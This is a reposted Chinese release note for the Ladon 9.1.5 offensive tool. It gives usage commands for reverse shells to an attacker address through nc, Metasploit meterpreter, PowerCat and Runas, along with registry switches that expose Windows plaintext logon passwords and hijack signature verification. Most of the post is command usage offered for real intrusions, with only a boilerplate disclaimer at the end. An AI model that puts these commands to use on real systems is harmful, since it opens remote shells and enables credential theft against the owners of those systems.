Ladon9.1.5大文件读取&反弹Shell生成器

admin
admin
admin
140350
文章
117
评论
2022年4月20日00:59:29评论90 views字数 1904阅读6分20秒阅读模式


9.1.5更新日志

LadonGUI 9.1.5 20220418[+]RevShell      反弹Shell命令生成(LadonNCPerlBashPythonPowerCatBase64)
Ladon 9.1.5 20220408[+]SetMzLogonPwd   修改注册表读取2012及后系统明文密码[+]SetSignAuth    修改注册表劫持签名签证[+]ReadFile      读取大文件前面指定长度内容(Ladon ReadFile c:k8.exe 1024K)[u]sc          修复SC添加启动项指定路径Bug


读取大文件指定长度内容(Ladon ReadFile c:k8.exe 1024K)

实战中可能会遇到一些很大的文件,但是我们不知道此文件是否包含我们想要的数据,如数据库文件,数据量可能会很大,可能几G、几十G都有可能,上百G很少件,一般管理员为了速度快,也会优化成几十份几十G的文件。哪怕是一个文件10G,甚至才一两G,我们要落地才能确认的话,会很费时间,特别是目标网络或VPS网速不给力时,几分钟能搞定的事,我们得浪费几小时或几天,效率会非常低,最快确认内容的方法就是读取文件指定长度即可。实战读取单个30G文件也是秒开,很快就确认了MDF文件是否存储相关数据。文本文件返回明文内容,二进制文件,返回的可能是乱码,但问题不大,因为我们主要是要确定那些数据库或相关文件是否有关心的内容。

Ladon9.1.5大文件读取&反弹Shell生成器


修改注册表读取2012及后系统明文密码

Usage: Ladon SetMzLogonPwd 1  开关1和0

Ladon9.1.5大文件读取&反弹Shell生成器


修改注册表劫持签名签证

Usage: Ladon SetSignAuth 1  开关1和0

Ladon9.1.5大文件读取&反弹Shell生成器



反弹Shell命令生成

虽然网上有很多文章或笔记,但有时候复制粘贴,网站可能会转义一些字符导致,复制的命令无法使用,就算能使用,也得替换IP和端口,有时测试某洞需要反弹,这条命令不行,又得换另外一条测试,折腾起来有点麻烦,为了方便,觉得还是有必要弄个生成器。麻烦的还有其它原因,如BASE64加密的BASH命令,替换完IP和端口还得加密,之前曾用的在线地址,TM的不能用,找到另外一个,生成的Payload不知道是那站点没添加引号还是被转义,导致无法使用。第一版(Ladon、NC、Perl、Bash、Python、PowerCat、Base64),后续会陆续完善添加各种反弹工具命令。

Ladon9.1.5大文件读取&反弹Shell生成器


反弹TCP

Usage:
Ladon ReverseTcp ip port type
type: meter shell nc

监听nc shell
监听nc shell可用工具非常多,如NC、LadonGui、PowerCat、MSF等
nc -l -v -p 4444
LadonGui--Netcat--Listen
powercat -l -p 4444

Ladon9.1.5大文件读取&反弹Shell生成器


反弹NC shell


Ladon ReverseTcp 192.168.1.8 4444 nc

Ladon9.1.5大文件读取&反弹Shell生成器


LadonGui监听

Ladon9.1.5大文件读取&反弹Shell生成器


常用NC监听

Ladon9.1.5大文件读取&反弹Shell生成器


反弹MSF TCP Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

Ladon9.1.5大文件读取&反弹Shell生成器

反弹MSF TCP Meter

Ladon ReverseTcp 192.168.1.8 4444 meter

Ladon9.1.5大文件读取&反弹Shell生成器


MSF成功反弹会话

Ladon9.1.5大文件读取&反弹Shell生成器

反弹TCP/UDP (CMD & PowerShell)

Load PowerCat
Usage:
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 cmd
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 psh
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 cmd -u
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 psh -u

反弹TCP,PowerCat监听执行PowerShell

Ladon9.1.5大文件读取&反弹Shell生成器

反弹HTTP/HTTPS

Usage:
Ladon ReverseHttp ip port
Ladon ReverseHttps ip port

MSF监听
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https
反弹MSF HTTPS Meter

Ladon ReverseTcp 192.168.1.8 4444 meter

反弹HTTPS

Ladon9.1.5大文件读取&反弹Shell生成器


MSF HTTPS监听会话

Ladon9.1.5大文件读取&反弹Shell生成器


Runas反弹

Ladon Runas k8gege k8gege520 cmd.exe 192.168.1.110 4444

Ladon9.1.5大文件读取&反弹Shell生成器


更多命令使用9.1.5生成器,http://k8gege.org/Ladon/ReverseShell.html

原文始发于微信公众号(K8实验室):Ladon9.1.5大文件读取&反弹Shell生成器

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日00:59:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ladon9.1.5大文件读取&反弹Shell生成器https://cn-sec.com/archives/928508.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息